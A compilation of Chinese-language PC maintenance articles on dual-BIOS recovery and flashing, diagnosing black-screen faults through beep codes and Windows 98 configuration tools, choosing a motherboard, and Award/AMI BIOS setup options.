在维护程序中选择“Recover Primary ROM from BACKUP ROM”，就可以通过刷新主BIOS 将其恢复到正常状态。如果不小心错选成“将主BIOS 复制到后备BIOS”，维护程序会提
醒操作错误，并拒绝这种行为，保证后备BIOS 不受损坏。当然，由于后备BIOS 也是可擦写的，而且任何BIOS 操作都是对当前正在工作的BIOS 起作用，如果在主BIOS 被损坏，由后备BIOS 启动机器时，不恢复主BIOS，又对后备BIOS 进行错误操作，就会损坏后备BIOS，导致无法启动。虽然发生这种情况的几率极小，却总是一种隐患。对此问题，1.3 版的BIOS 的维护程序中又增加了自动恢复、全面保护等新功能，使BIOS 意外损坏的可能性几乎降低到了零。
为了保证升级在纯DOS环境下进行，可准备一张启动盘并拷贝上相应的升级程序，用软盘开机，即可进入纯DOS状态。当然，也可以用硬盘来启动机器，在机器启动时，敲“F8”
键，选择“Command Prompt Only”进入纯DOS 方式。从硬盘升级BIOS 的可靠系数会更高一些。下面以Award 7.52 版
的FLASH 升级程序为例，来说明一下具体的操作步骤。
(1)将RD2000 开关选择至ORG 位置，然后启动系统至纯DOS 状态下，运行FLASH 升级程序。
(2)进行BIOS 的备份，将主板上原BIOS ROM 芯片中的数据保存到磁盘上，退出升级程序。
(3)保持开机状态，将RD2000 的选择开关打至RD1的位置。
(4)重新执行FLASH升级程序，把步骤(2)所保存的BIOS数据写入到RD2000 的ROM中，操作过程中不用关机。
(2):电脑黑屏故障！
1.主机不亮
一为开机后黑屏，主机和显示器的指示灯均不亮，或显示器的指示灯亮而主机的指示灯不亮。这类故障应先检查主机电源及电源开关的好坏及其连接正常与否，特别是电源线及电源插座是否连接正常与完好。如果电源有问题，在打开电脑后可见主机机箱面板指示灯不亮，并且听不到主机内电源风扇的旋转声和硬盘自检声等等，表明你的主机系统根本就没得到正常的电源供应——这类问题首先应检查外部是否有交流电的问题。用测电笔看看电源插座及电源线接向主机电源的一侧是否有电，必要时用万用表检测其电压是否正常，电压过高或过低都可能引起主机电源发生过压或欠压电路的自动停机保护。如果以上都没问题，那么你应该先将维修重点放在主机内部和电源开关及复位键，可采用最小系统法和换件法，逐一拔去主机内插卡和其他设备电源线、信号线，再通电试机。如拔除某设备时主机电源恢复工作，则是刚拔除的设备损坏或安装不当导致短路，使电源中的短路保护电路启动，停止对机内设备供电，那么你可以重点检查它的接触情况，必要时更换。另外重点检查电源开关及复位键的质量，它们与主板上的连线的正确与否也很重要，因为许多劣质机箱上的电源开关及复位键经常发生使用几次后其内部金属接触片断裂而发生电源短路的情况，造成整机黑屏无任何显示。如以上检查都没能解决问题，那么请更换电源或拆开电源，重点检查一下其保险管或元器件是否被熔断或损坏。
此外，主机的主板、CPU、CPU风扇及显卡等配件被损坏也可造成主机不亮的黑屏故障。同时在维修时还应重点检查主板上的各种电源连接线信号是否连接正确或有松动。
2.主机可自检
开机后黑屏，指示灯亮，主机开关电源也正常旋转，但听不到硬盘自检的声音，不过能听到喇叭的鸣叫; 或开机有屏幕显示，也能听到机器自检声，但是屏幕僵在自检的某一
步，偶尔还会出现错误提示; 或者出现随机性不显示的动态黑屏故障，时而能显示或正常启动、时而又黑屏的故障。
(1)听音辨故障
对于常见的开机黑屏故障我们可通过辨别主机启动时喇叭的报警声来辨别。
Award BIOS的主板故障警告表
1 短:系统正常启动。
1 长1 短:内存或主板出错。
1长2短:显示器或显卡错误。
1 长3 短:键盘控制器错误。
1长9短:主板BIOS损坏。
不断地响（有间歇的长声）:内存条未插紧或损坏。
不停地响:电源、显示器未和显卡连接好。检查一下所有的接插件。
重复短响:电源有问题。
AMI BIOS的主板故障警告表
1短:内存刷新失败。
3短:系统基本内存（第1个64KB）检查失败,需换内存。
4短:系统时钟出错。
5短:中央处理器（CPU）错误。
6短:键盘控制器错误。
7 短:系统实模式错误，不能切换到保护模式。
8 短:显示内存错误。
9短:BIOS检验错误。
1长3短:内存错误。
1长8短:显示测试错误，显示器数据线没插好或显卡没插牢。
需要特别说明的是，在实践中发现许多用户最常遇到的此类黑屏故障多半是由于内存条未插紧或损坏，而发出的间歇的喇叭报警声，大家可重点检查一下内存条是否松动或有
灰尘进入，可取下内存条将内存插槽或内存清扫干净，或换一个内存插槽插上，或换根内存试试。
(2)检查配件安装质量
发生此类黑屏故障，你还应该首先检查配件的安装质量。例如内存条安装是否正确，是否与主板插槽插紧，显卡等插卡是否安装到位，以及它们在BIOS中的相关设置，在主板上的跳线选择是否正确，可仔细参看相关的板卡说明书进行设置。建议一般用户使用BIOS的出厂设置。有时候内存的类别设置与实际不符，内存的存取速度设置过快，如果用户的内存性能无法达到要求而强行设置，那么就容易发生死机，而不同品牌的内存混用以及Cache的设置失误都会造成死机黑屏。另外重点检查板卡自身的质量问题以及主板上的相关插槽及卡上的“金手指”部位是否有异物。
此外CPU是否被超频使用，硬盘或光驱数据线是否接反等都需要你考虑。此外，当你添加了一些新设备之后，显示器便出现了黑屏故障，排除了配件质量及兼容性问题之后，电源的质量不好、动力不足可能是故障的主要起因，更换大功率质优电源是这类故障的最好解决办法。现在这类电源动力不足引起的系统黑屏非常普遍。
（3）其他
电脑配件质量不佳或损坏，是引起显示器黑屏故障的主要原因。例如主板（及主板的BIOS）、内存、硬盘、显卡等出现问题极可能引起黑屏故障的出现。其故障表现如显示器灯呈橘黄色等，这时用替换法更换下显卡、内存、主板、CPU试试，是最快捷的解决办法。其他如主板CMOS设置不正确，主板清除BIOS跳线不正确等都可引起黑屏故障，这时你可对照主板说明书更改其设置。此外软件冲突如驱动程序有问题或安装不当，BIOS
刷新出错，电源管理设置不正确，恶性病毒（CIH）引起硬件损坏等都有可能引起此类黑屏故障的出现。此外，你的配件和操作系统或驱动程序或系统软件不兼容也可引起启动时进入Windows自检画面时的死机黑屏故障，这些都需做到细心了解。
故障实例
一MVP4 主板，K6-2 300 的CPU，128M 内存，酷鱼二代30G硬盘，有光驱、软驱的兼容机，没有超频使用，出现随机性启动黑屏故障，故障表现为有时开机时能正常自检正常使用，但经常出现开机黑屏故障。
分析与解决:笔者接手该机，开机后表现为黑屏但有内存出错的连续鸣叫声，怀疑是内存松动，打开机箱，见机内两根内存插槽上插有两根64M的HY内存，将内存取下清扫干净，重新安装好后，开机故障消失，便重新装好电脑再启动，却又出现无报警声黑屏。便又打开机箱，先取下一根内存，再将另一根内存反复按下插紧，并连续几次开启电源，电脑皆正常，便又关上机箱后装好电脑，使用一切正常。但第二天该用户又来电话称，电脑又黑屏了。遂将电脑移到我处仔细观察，再度重新安装内存并换上新内存，奇怪的是电脑居然再也没有报警声及开机自检声了。先用最小系统法拆开硬盘、光驱、声卡等，只留下主板、CPU、内存、显卡的最小系统，依然黑屏，遂用换件法一一试之，该机配件皆正常，便重新在机外安装好最小系统再度开机，电脑又恢复正常。首先排除了机内有短路的情况，重点怀疑内存插槽有问题及CMOS电池电压不足，本着先易后难的维修原则，取下CMOS电池用万用表试之有3.03v左右，拿来一新的CMOS电池试之有3.35v左右，旧电池电力稍显不足，遂更换之，更换后装好机，不上硬盘连续开关机，不再有随机性黑屏故障出现。以为万事大吉，第二天该用户来取电脑，开机试之主机风扇皆正常运转，但无报警声、自检声，显示屏再度黑屏且无任何屏幕显示，又数次装拆机都不能解决问题，觉得十分奇怪，遂怀疑电脑主板或主板与部件间有接触不良，或元器件虚焊，重点检查主板，取下主板仔细观察其元器件并无明显松动迹象，用放大镜观察其底板焊点，发现CMOS芯片插座有虚焊迹象，取来烙铁为其一一补焊（特别注意，一般用户切忌自己动手补焊，除非你有很高的焊接技术，如实在查找不到可先尝试对主板电源及大个元器件可疑的焊点进行补焊），故障彻底排除之。此例故障为明显元器件焊接质量所造成的故障，普通用户最好可选购利用“主板诊断卡”之类的检测工具对这类硬故障判断个大概部位，更能做到有的放矢。
三、系统运行中的黑屏故障
系统运行中的黑屏故障主要可分为由硬件原因引起的黑屏、软件故障引起的黑屏及软硬件不兼容引起的黑屏几类。而且系统运行中的黑屏故障还经常和死机现象相伴。
1.硬件原因
硬件原因引起的黑屏或蓝屏死机故障多为配件的质量不佳、兼容性欠佳、物理损坏所造成。大家知道，电脑各部件的本身质量问题，插接件的接口接触不良问题，硬件设备的
设置问题（例如BIOS问题、驱动程序完善问题、与系统的兼容性问题、硬件供电设备的稳定性问题、抗外界干扰性问题）等，都有可能引发电脑硬件黑屏死机故障。特别是内存或显存质量欠佳是引起这类故障的主因，大家在检查这类故障时可首先替换内存或显卡来试试，而对于有不同种类或型号的内存混插的电脑，先保留单一内存种类试试。此外，主板与CPU、主板与显卡的兼容性问题也值得你在解决这些问题时留意。在安装与拆卸硬件设备时的黑屏死机故障也很常见，它通常和设备的安装不合理不到位、静电的干扰及设备间的设备/中断冲突有关，所以在设置设备时，最好先检查有无该设备的保留中断号（IRQ），不要让其他设备使用该保留中断号。
2.软件原因
在系统运行中发生的黑屏故障，软件原因较之硬件类黑屏死机现象更常见。例如，操作系统本身的兼容性问题，操作系统与应用软件的兼容性问题，系统程序的设置或已损坏丢失问题，应用软件本身的Bug问题，软件的设置问题，以及软件和软件之间冲突问题，都有可能引发系统的软件原因黑屏死机。
新老版本的Windows系统的软件兼容性——如有的Windows版本本身设计得不完善与不成熟很可能造成其兼容性不佳引起黑屏死机，老版本的Win95/98与新版Win2000/XP等的应用软件与系统或驱动程序的冲突等，特别是在Win98等操作系统中使用Win3.X中的16 位应用软件，就很可能造成16 位应用软件与Win98 等32位操作系统不兼容。
系统与应用软件的兼容性或损坏——Windows系统软件的被损坏或丢失有可能造成死机故障的产生，因为系统启动是一步一个脚印的过程，哪一个环节都不能出现错误，如果存在损坏的执行文件或驱动程序，系统就会僵死在这里。当然一些版本的Windows系统或软件，设计上的缺陷或兼容性考虑的不完善也可能造成系统运行时的当机黑屏。
应用软件与应用软件的兼容性——在硬盘越来越大的今天，安装软件过多，很可能造成软件和软件之间的“打架”，轻则造成不能正常使用，重则可使电脑黑屏死机。此外，计算机感染病毒造成一些文件不能正常使用，当然也会造成黑屏死机故障的产生，而一些即时杀/防毒软
件有时也是计算机频繁黑屏死机的罪魁祸首。
此外对于Config.SYS、Win.INI、Auto执行.BAT、System.INI等系统配置文件，如无特别需要，最好不要在这些系统文件中加载多余数据。
在Win98/Me/XP 中，可以单击“开始”，然后单击“运行”。在“打开”框中，键入“msconfig”，然后单击“确定”即可打开“系统配置实用程序”查看或更改以上系统配置文件的加载情况。如果Config.SYS和Auto执行.BAT文件使系统挂接了DOS实模式下的光驱驱动程序，那么就容易造成黑屏死机，这是因为在DOS实模式状态下工作的CD-ROM的读取在操作时需要BIOS提供低层服务程序，而Win98以上操作系统却使用自己的32位保护模式的驱动程序，二者很容易产生冲突。
故障实例
启动计算机时，系统显示“VxD无效”的错误消息并黑屏死机。
分析与解决: 首先，如果你最近从计算机上删除过程序或组件，请重新安装它，然后运行相应的卸载工具。如果找不到程序或组件的卸载工具，可与厂商联系以获取删除程序或组件的说明。
如果Vnetsup.vxd文件丢失，可先安装然后再删除网络组件就可避免发生这一问题。后双击“网络”，单击“添加”，单击“适配器”，然后单击“添加”。
在“厂商”框中，单击“已检测到的网络驱动程序”。在“网络适配器”中，单击“现有的Ndis2驱动程序”，然后单击“确定”。系统提示输入作组名和计算机名时，请填写“标识”选项卡上的对应框。连续单击“确定”或“关闭”，直到返回“控制面板”。系统提示重新启动计算机时，请单击“确定”。重新启动计算机后，双击“网络”。单击“现有的Ndis2驱动程序”，单击“删除”，然后单击“确定”。系统提示重新启动计算机时，请单击“确定”即可。
——如果错误消息涉及.386文件，可禁用System.ini文件中所涉及的设备驱动程序行。要禁用所涉及的设备驱动程序，单击“运行”键入“msconfig”，然后单击“确定”。
在“System.ini”选项卡中，双击“[386Enh]”，定位涉及设备驱动程序的行，单击以清除此行边上的复选框，然后单击“确定”。系统提示重新启动计算机时，请单击“确定”。如果错误消息涉及不带扩展名的文件，则该文件可能未在此节中列出，如果该文件未在此节中列出，可选择下面的“否”。
——注册表中的StaticVxD值是否正确？如果错误消息并未指定设备驱动程序，则注册表中
的某个StaticVxD 值可能为空或者只包含空格。
StaticVxD值位于注册表的下列项内:
HKEY_LOCAL_MACHINE\System\CurrentControlSet
\Services\VxD。要更正注册表中的StaticVxD
值，可先备份注册表文件，单击“运行”。在“ 打开” 框中，键入“scanregw”，然后单击“确定”。提示备份系统注册表时，请单击“是”， 然后单击“ 确定”。使用“ 注册表编辑器”查找和删除注册表中含有的无效数据、空数据或仅含空格的StaticVxD 值。单击“运行”。在“打开”框中键入“regedit”，然后单击“确定”。在注册表编辑器中，展开上面讲到的键。在该键下的所有子键中查找含有的无效数据、空数据或仅含空格的StaticVxD 值。右键单击这些条目，然后单击“删除”即可。
如果在系统关闭时发生黑屏死机，一般来说和系统的设定、电源的设定及稳定性、硬件设备的稳定性及其驱动程序的安装和设置等等都有很大的关系。特别是一些应用或驱动程序的设置或使用不当，或在使用中出错都有可能造成关机时的黑屏死机现象，在“设备管理器”中重新或更新安装一些有黄色感叹号的带冲突的设备的新驱动，或试着卸载一些应用程序试试。
故障实例
试图关闭Windows时计算机没有响应或呈黑屏状。
分析与解决:首先可确定“退出Windows”声音文件是否已毁坏——单击“控制面板”，然后双击“声音”。在“事件”框中，单击“退出Windows”。在“名称”中，单击“（无）”，然后单击“确定”。关闭计算机。如果Windows 正常关闭，则问题是由退出声音文件引起的，要解决这一问题，请选择下列某项操作: 从备份中恢复声音文件; 重新安装提供声音文件的程序; 将Windows配置为不播放“退出Windows”声音文件。
——快速关机是Windows98中的新增功能，可以大大减少关机时间。但是，该功能与某些硬件不兼容，如果计算机中安装了这些硬件，可能会导致计算机停止响应。可禁用快速关机，单击“运行”，在“打开”框中键入“msconfig”，然后单击“确定”。单击“高级”，单击以选中“禁用快速关机”复选框，单击“确定”，然后再次单击“确定”。系统提示重新启动计算机，可重新启动。如果计算机能正常关机，则快速关机功能可能与计算机上所安装的一个或多个硬件设备不兼容。
——计算机上的“高级电源管理（APM）”功能也可引起关机死机或黑屏问题。要确定APM 是否会引起关机问题，双击“系统”。在“设备管理器”选项卡上，双击“系统设备”。双击设备列表中的“高级电源管理”，单击“设置”选项卡，然后单击以清除“启用电源管理”复选框。单击“确定”。重启计算机，再关闭计算机，如果计算机正常关机，则问题的原因可能在
于APM。
——在Bootlog.txt文件中存在定位问题也可引起关机黑屏故障。
可先使用文本编辑器，如“记事本”，检查Bootlog.txt 文件中的“Terminate=”条目。这些条目位于文件的结尾，可为问题的起因提供一定的线索。对于每一个“Terminate=”条目，查找所匹配的“EndTerminate=”条目。如果Bootlog.txt文件的最后一行为
“EndTerminate=KERNEL”，Windows98就可成功关闭。
——检查Config.sys文件或Auto执行.bat文件中是否存在冲突。先确定Config.sys文件或Auto执行.bat文件中是否存在冲突，单击“运行”。在“打开”框中，键入“Msconfig”，然后单击“确定”。单击“诊断启动”，单击“确定”。系统提示重新启动计算机时，请单击“确定”。如果计算机的启动或关闭不正确，请确定问题是由Config.sys 或Auto执行.bat文件的哪一行引起的。
要确定引起问题的行，可重新启动计算机。计算机重新启动时，请按住Ctrl 键。从“Startup”菜单中选择“Safe Mode 安全模式”。单击“运行”。在“打开”框中，键入“Msconfig”，然后单击“确定”。单击以清除Config.sys和Auto执行.bat选项卡中不含Windows图标行的复选框。使用此Config.sys文件，单击以启用某行，单击“确定”。
当系统提示重新启动计算机时，单击“确定”。如果计算机的启动和关闭都很正常，请启用另一行，并重复上述步骤的操作，以逐步启用Config.sys文件和Auto执行.bat文件中的行，直到发现问题为止。
——确定是否存在内部系统问题。单击“运行”在“打开”框中，键入“Msconfig”，然后单击“确定”。在“常规”选项卡中单击“高级”。单击以清除“高级疑难解答设置”中的下列复选框:禁用系统ROM中断点;禁用虚拟HD IRQ;EMM不包含A000-FFFF，然后单击“确定”，系统提示重新启动计算机时，单击“确定”。如果计算机正常启动，可重复以上步骤，选中某个复选框。重复此过程，每次选中其他某复选框，直到发现计算机无法正常启动为止。一旦发现计算机无法重新启动，可再次重复以上步骤单击以清除刚才选中的复选框即可。
——确定System.ini文件或Win.ini文件中是否存在冲突。“运行”。在“打开”框中，键入“Msconfig”，然后单击“确定”。
在“常规”选项卡中，单击清除“选择性启动”中的所有复选框，单击选中“处理System.ini 文件”复选框，单击选中“处理Win.ini文件”复选框，单击“确定”。系统提示重新启动计算机时，单击“确定”。如果计算机无法正常启动或关闭，则System.ini或Win.ini文件中的条目存在问题。请仔细检查每一条目，以确定导致问题的原因。确定引发问题的条目之
后，请删除此条目，在此条目前加分号“;”以禁用此条目或修改此条目，以使不再引起问题。
——确定“启动”文件夹中的程序是否与启动过程冲突。“运行”。在“打开”框中，键入“Msconfig”，然后单击“确定”。单击选中“装载启动组项目”复选框，单击“确定”。系
统提示重新启动计算机时，请单击“确定”。如果计算机无法正常启动或关闭，则问题的起因可能在于从“启动”文件夹中加载的程序。
可分离引发问题的程序。“运行”。在“开始”框中，键入“Msconfig”，然后单击“确定”，清除“装载启动组项目”复选框。在“启动”选项卡上，除保留一个复选项外（任何一
个均可），清除其他所有复选框，单击“确定”。系统提示重新启动计算机时，单击“确定”。如果计算机正常重新启动，请重复上面步骤的操作，并一次仅选择“启动” 选项卡中的一个复选框。如果计算机无法正常重启动，则最后启用的程序就是问题之所在。
装卸Windows系统及应用软件时的黑屏死机故障肯定大家更是经常遇到，它有可能是软件自身的问题，也有可能是软件和硬件设备冲突所致，还有可能是你错误的安装方法所致。
例如，一些用户用Win95的系统盘向C盘传送系统后再安装Win98系统，就很有可能在更新系统设置时发生黑屏死机故障，所以大家特别要注意，不同的DOS 启动版本不要在不同的Windows系统中混用。再例如，在BIOS中将“Virus Warning”设置为“Enabled”，那么在安装indows进入到硬件检测阶段时很可能出现黑屏或死机。
四、其他问题
对电脑的正确使用，可以增加系统的稳定性，减少黑屏现象的发生。
例如正确地安装软硬件，少用试用版、测试版软件，且注意安装新软件时最好不要覆盖掉一些系统文件。
不要打开太多的窗口，也是减少黑屏的要点，特别是内存太少时。
此外，保持硬盘等存储设备的合理容量与使用空间，也是很好的减少黑屏死机的方式，这
就要求定期整理硬盘的磁盘空间，提高硬盘的工作稳定性，而不要让?1硬盘空间太满或文件
碎片太多。
正确地卸载软件而不是将其在硬盘上直接硬删除，以免将一些系统共享文件破坏，造成系统不稳定性的增加。另外，正确地开关机也很重要，如系统正常运行中突然随手按下电源开关，很可能造成系统文件的损坏，使系统黑屏死机增多。
此外，注意所安装的软件与软件、软件与硬件、硬件与硬件的搭配的合理性，也是减
少死机的好办法。例如，你如果发现安装一个
新软件之后系统死机现象增加，你可将该软件
卸载掉，或安装其更新或较稳定的版本。
最后我们提醒你注意电脑各设备的散热
和静电情况，保持良好的散热，妥善地将计算
机做接地处理，肯定将大大减少黑屏死机的
发生。
虽是老生常谈，但只要你掌握了我们以上
介绍的一些知识，在应对电脑黑屏故障时，一
定能更加地从容自如。
最后一行可能原因
Terminate=Query Drivers 内存管理程序有问题。
Terminate=Unload Network 与Config.sys 中的实模式网络驱动程序冲突。
Terminate=Reset Display 可能需要禁用视频阴影生成，也可能需要更
新视频驱动程序。
Terminate=RIT 声卡或旧的鼠标驱动程序存在与计时器有关
的问题。
Terminate=Win32 与32位程序有关的问题阻塞了线程
(4):主板问题介绍：
论坛上经常会有网友会问一些关于主板的问题，我所以写一篇文章和大家一起讨论一下，由于主板技术实在是博大精深，不可能面面俱到，本人也水平有限，我所谈到的只是冰山一角，有很多不足之处，欢迎大家指出。

主板工艺是很直观的,看一块设计成功的主板实在是一种艺术享受！！！现在一般的主板都是多层的印刷电路板。台湾主板商为了降低成本，现在大多用的是四层板，而欧美厂商出的很多都是服务器板，为了稳定用的多是六层，而早期的主板都是双面板，据说现在最复杂的电路设备已经超过了112层，够厉害吧？我估计是用在军事或航天技术上。所谓的多层电路板，就是把两层以上的薄双面板牢固的胶合在一起成为一块组件，这种结构即适应了复杂的设计又改善了信号特征，其中的电源线路层和地线层深埋在主板的内层，不易受到电源杂波的干扰，尤其是高频电路，可以获得较好的抗干扰能力，表层一般为信号层，如此一来电路板的体积也可缩小，成本可以降低。不过多层设计带来的最大问题就是难以修理，如果在安装主板过程中过度的弯曲，可能会破坏其中隐藏的铜导线。修理这样的破坏是非常困难的。另外主板上有很多的电阻和电容，如SMT贴片式元件，DIP插接元件，大工厂用波峰焊接或表面装配来连接插件，而一些生产杂牌的小厂，他们很多部件是用人工装配的，质量就难以保证了。最后来澄清一个误区，主板并不是层数越多越好，关键要看工程师的设计水平，4层已经很稳定的话为什么要花更多的钱买6层板呢？四层板能达到六层板的水平更说明了工程师的的设计水平之高！！！

同样电容也是很重要的，一般的好的板子在CPU和AGP插槽附近使用大量高容量的电容（最好是钽电容）一般来讲，电容小而多比大而少，输出的电流更纯净和稳定。另外好的板子用的贴片电容，比一般的电解电容的寿命要长。布线也很重要，我们经常可以看到很多的蛇行布线，其主要的作用是保证各条线的长度一致，减少工作时的电感和互相产生的干扰。好的主板版面平整，小电容等元件没有被压倒或明显变形的痕迹，板上的铜箔导线也光滑，无毛刺，焊点均匀。主板元件同做工一样重要，好的主板用的CPU,AGP,PCI插槽，都是用FOXCOM、MOLEX、KORTAK 等外部名牌元件。反复插拔都不会产生接触不良的问题。我经过仔细比较，个人认为在台湾地区，技嘉主板的做工最好，华硕次之，升技第三，微星虽然做工不如前三者，但是稳定性还是不错的。各位如果有条件的话，可以自己去比较一下，看技嘉的主板明显要比其他的板子看上去要舒服，当然Micronics，Supermicro等欧美厂商工艺水准也很不错,多用于服务器工作站。我等可买不起。

谈到主板就一定要谈一下主板结构，主板一般是由，芯片组，cpu插槽，内存插槽，I/O插槽（包括AGP,PCI,ISA)BIOS/CMOS芯片，IDE或SCSI接口，软区接口，电源接口，串口，并口，USB接口。鼠标键盘接口，电池，晶振，红外线接口，AMR接口等组成。如果说cpu是核心的话，芯片组就是灵魂，前段时间就有VIA的南桥686B出现掉文件的现象，VIA在各位网友心目中的光辉形象大受打击，芯片组市场的竞争是很激烈的，一有大的闪失就有可能永世不得翻身，并非危言耸听，我这里有一些586时代或更古老的芯片组厂商，大家看看还有几家留在大家的脑海里： Intel,Chips,Vlsi,OPTI,UMC,OAK，NEC，VIA,TEXAS,EFAR,TSMC,LSI,SIS,ALI,AMD,ACC,ETEQ,CYRIX,WINBOND,HARRIS，PICOPOWER,CONTAQ,留下的恐怕没几家吧，大家可以想象到芯片组市场竞争的激烈程度，真心希望VIA能够妥善处理此事，不要敷衍了事，而辜负广大电脑爱好者的支持！！！

做工谈到这里，我再来简单谈一下主板选购的技巧：

1，不要赶时髦，尝鲜，买主板不是买海鲜，一般最新推出主板的软硬件的兼容性还有待时间的考验，有的芯片或主板厂商甚至为了抢占市场，打时间差，推出了未经严格测试的主板，死机频频。你也可以带几个测试稳定性的软件去试试，如3DMark 2000和3D Winbench 2000，NORTON工具箱等等。

2，不要迷信评测，因为一般都是用几个软件测试一下，不能代表普遍性，最好的办法就是到论坛上发贴，让大家帮你解决问题，相信你会得到满意的回答。

3 ，要“大小通吃，不会挑食”好的主板不会挑内存，各种插卡或外围设备来者不拒，更不会挑电源。

4，如果要买超频的板子的话，要注意以下技术：免跳线技术，CPU 核心电压可调和I/O 电压可调技术，多外频技术及多分频技术，异步内存调整技术，AMDcpu还应该有倍频可调技术，相信我以后会有用的：）

5，主板监控管理：监控技术主要体现在主板温控和电压管理上，AMD主板更应该有此技术，天热了，龙或鸟烧了可不要来找我，最好能在windows中提醒，如微星的pc alertⅢ。

6，板载指示灯技术，对故障硬件的诊断更容易。

7，防毒能力：如技嘉的双BIOS，中了cih够你折腾。

8，主板芯片要支持DMA100-对硬盘加速和系统资源占用的减少都很有作用。

9，主板结构设计合理，CPU周围的大电容不影响装大风扇，特别是用AMDcpu的主板，特别要注意。

10，系统要经得起“折腾”，频繁开关机应该没问题，开机8小时以上应该不死机。

11。最后最重要的是要买主板的时候要找一家信誉良好，负责任，而且有技术支持的js，电脑不是一般的商品，买到电脑只是买到一半，还有的一半是服务和技术支持，如果到时候出了问题，自己又没有维修的经验，叫天天不应，叫地地不灵，就“咦。。。。。。。呀”（学央视笑傲江湖）
(5):主板BIOS相关知识：
Standard Setup（标准设定）窗口　　Date/Time: 显示当前的日期/时间，可修改。　　Floppy Drive A，B: 设定软盘驱动器类型为None/720K/1.2M/1.44M/2.88M 。　　Pri Master/Slave以及Sec Master/Slave: 此选项可设定:　　HDD 无效（硬盘类型）: Auto(自动检测)、SCSI(SCSI HDD)、CD－ROM驱动器、Floptical(LS－120大容量软驱)或是无效 1～47等IDE设备。　　LBA/Large: 硬盘LBA/Large 模式是否打开。目前540M以上的硬盘都要将此选项打开(On)，但在Novell Netware 3.xx或4.xx版等网络操作系统下要视情况将它关掉(Off)。　　Block Mode: 将此选项设为On，有助于硬盘存取速度加快，但有些旧硬盘不支持此模式，必须将此选项设为Off。　　32 Bit Mode: 将此选项设为On，有助于在32位的操作系统（如WIN95/NT）下加快硬盘传输速度，有些旧硬盘不支持此模式，必须将此选项设为Off。　　PIO Mode: 支持PIO Mode0～Mode5(DMA/33)。用BIOS程序自动检查硬盘时，会自动设置硬盘的PIO Mode。　　注意：当你在系统中接上一台IDE设备（如硬盘、光驱等）时，最好进入BIOS，让它自动检测。如果使用的是抽屉式硬盘的话，可将无效设成Auto，或将Primary以及Secondary的无效都改成Auto 即可。所谓Primary指的是第一IDE接口，对应于主板上的IDE0插口，Secondary指的是第二IDE接口，对应于主板上的IDE1插口。每个IDE接口可接Master/Slave（主/从）两台IDE设备。Advanced Setup（高级设定）窗口　　1st/2rd/3rd/4th Boot Device: 开机启动设备的顺序，可选择由IDE0～3、SCSI、光驱、软驱、 Floptical (LS－120大容量软驱)或由Network(网络)开机。　　S.M.A.R.T For HardDisk: 开启（Enable）硬盘S.M.A.R.T功能。如果硬盘支持，此功能可提供硬盘自我监控的功能。　　Quick Boot: 开启此功能后，可使开机速度加快。　　Floppy Drive Swap: 若将此功能Enable，可使A驱与B驱互换。　　PS/2 Mouse Support : 是否开启PS/2鼠标口，若设定为Enable，则开机时，将IRQ12保留给PS/2鼠标使用，若设定为Disable，则IRQ12留给系统使用。　　Password Check: 设定何时检查Password(口令)，若设定成Setup时，每次进入BIOS设定时将会要求输入口令，若设定成Always时，进入BIOS或系统开机时，都会要求输入口令，但先决条件是必须先设定口令(Security窗口中的User选项)。　　Primary Display: 设定显示卡的种类。　　Internal Cache: 是否开启CPU内部高速缓存（L1 Cache），应设为Enable。　　External Cache: 是否开启主板上的高速缓存（L2 Cache），应设为Enable。　　System BIOS Cacheable: 是否将系统BIOS程序复制到内存中，以加快BIOS存取速度。　　C000－DC00，16K Shadow: 此8项是将主内存的UpperMemory（上位内存区）开启，将所有插卡上ROM程序映射到内存中，以加快CPU对BIOS的执行效率。Disable:不开启本功能；Enable:开启，且可提供读写区段功能；Cached:开启，但不提供读写功能。Chipset Setup（芯片组设定）窗口　　本功能中的选项有助于系统效率的提升，建议使用默认值。若将某些Chipset、DRAM/SDRAM或SRAM部分的Timing值设得过快，可能会导致系统 死机 或运行不稳定，这时可试着将某些选项的速度值设定慢一点。　　USB Function Enabled: 此选项可开启USB接口的功能，如没有USB设备，建议将此选项设为Disable，否则会浪费一个IRQ资源。　　DRAM Write Timing: 设定DRAM的写入时序，建议值如下:　　70ns DRAM: X－3－3－3； 60ns DRAM: X－2－2－2。　　Page Mode DRAM Read Timing: 设定DRAM读取时序，建议值如下 :　　70ns DRAM: X－4－4－4； 60ns DRAM: X－3－3－3。　　RAS Precharge Period: 设定DRAM/EDO RAM的Precharge（预充电）时间，建议设成4T。　　RAS to CAS Delay Time: 设定DRAM中RAS到CAS延迟时间，建议设定成3T。　　EDO DRAM Read Timing: 设定EDO DRAM读取时序，建议值如下:　　70ns DRAM : X－3－3－3； 60ns DRAM : X－2－2－2。　　DRAM Speculative Read: 此选项是设定DRAM推测性的引导读取时序，建议设定成Disable。　　SDRAM CAS Latency: 设定SDRAM的CAS信号延迟时序，建议设定值如下 :　　15ns(66MHz)/12ns(75MHz) SDRAM: 3　　10ns(100MHz) SDRAM: 2。　　SDRAM Timing: 设定SDRAM(同步内存)的时序，建议设定值如下:　　15ns(66MHz)/12ns(75MHz) SDRAM: 3－6－9　　10ns(100MHz) SDRAM: 3－4－7。　　注意：若系统使用SDRAM不稳时，建议将SDRAM速度调慢。　　SDRAM Speculative Read : 此选项是设定SDRAM推测性的引导读取时序，建议设定成Disable。　　Pipe Function: 此选项设定是否开启Pipe Function（管道功能），建议设定成Enable。　　Slow 刷新: 设定DRAM的刷新速率，有15/30/60/120us ，建议设在60us。　　Primary Frame Buffer: 此选项保留，建议设定成Disable。　　VGA Frame Buffer: 设定是否开启VGA帧缓冲，建议设为Enable。　　Passive Release: 设定Passive Release（被动释放）为Enable时，可确保CPU与PCI总线主控芯片（PCI Bus Master）能随时重获对总线的控制权。　　ISA Line Buffer: 是否开启ISA总线的Line Buffer，建议设为Enable。　　Delay Transaction: 设定是否开启芯片组内部的Delay Transaction（延时传送），建议设成 Disable。　　AT Bus Clock: 设定ISA总线时钟，建议设成Auto。Power Management Setup（能源管理）窗口　　能源管理功能可使大部份周边设备在闲置时进入省电功能模示，减少耗电量，达到节约能源的目的。电脑在平常操作时，是工作在全速模式状态，而电源管理程序会监视系统的图形、串并口、硬盘的存取、键盘、鼠标及其他设备的工作状态，如果上述设备都处于停顿状态，则系统就会进入省电模式，当有任何监控事件发生，系统即刻回到全速工作模式的状态。省电模式又分为“全速模式(Normal)、打盹模式(Doze)、待命模式(Standby)、沉睡模式(Suspend) ，系统耗电量大小顺序:Normal Doze　　Standby Suspend。　　Power Management/APM: 是否开启APM省电功能。若开启(Enable)，则可设定省电功能。　　Green PC Monitor Power State/Video Power Down Mode/Hard Disk Power Down Mode : 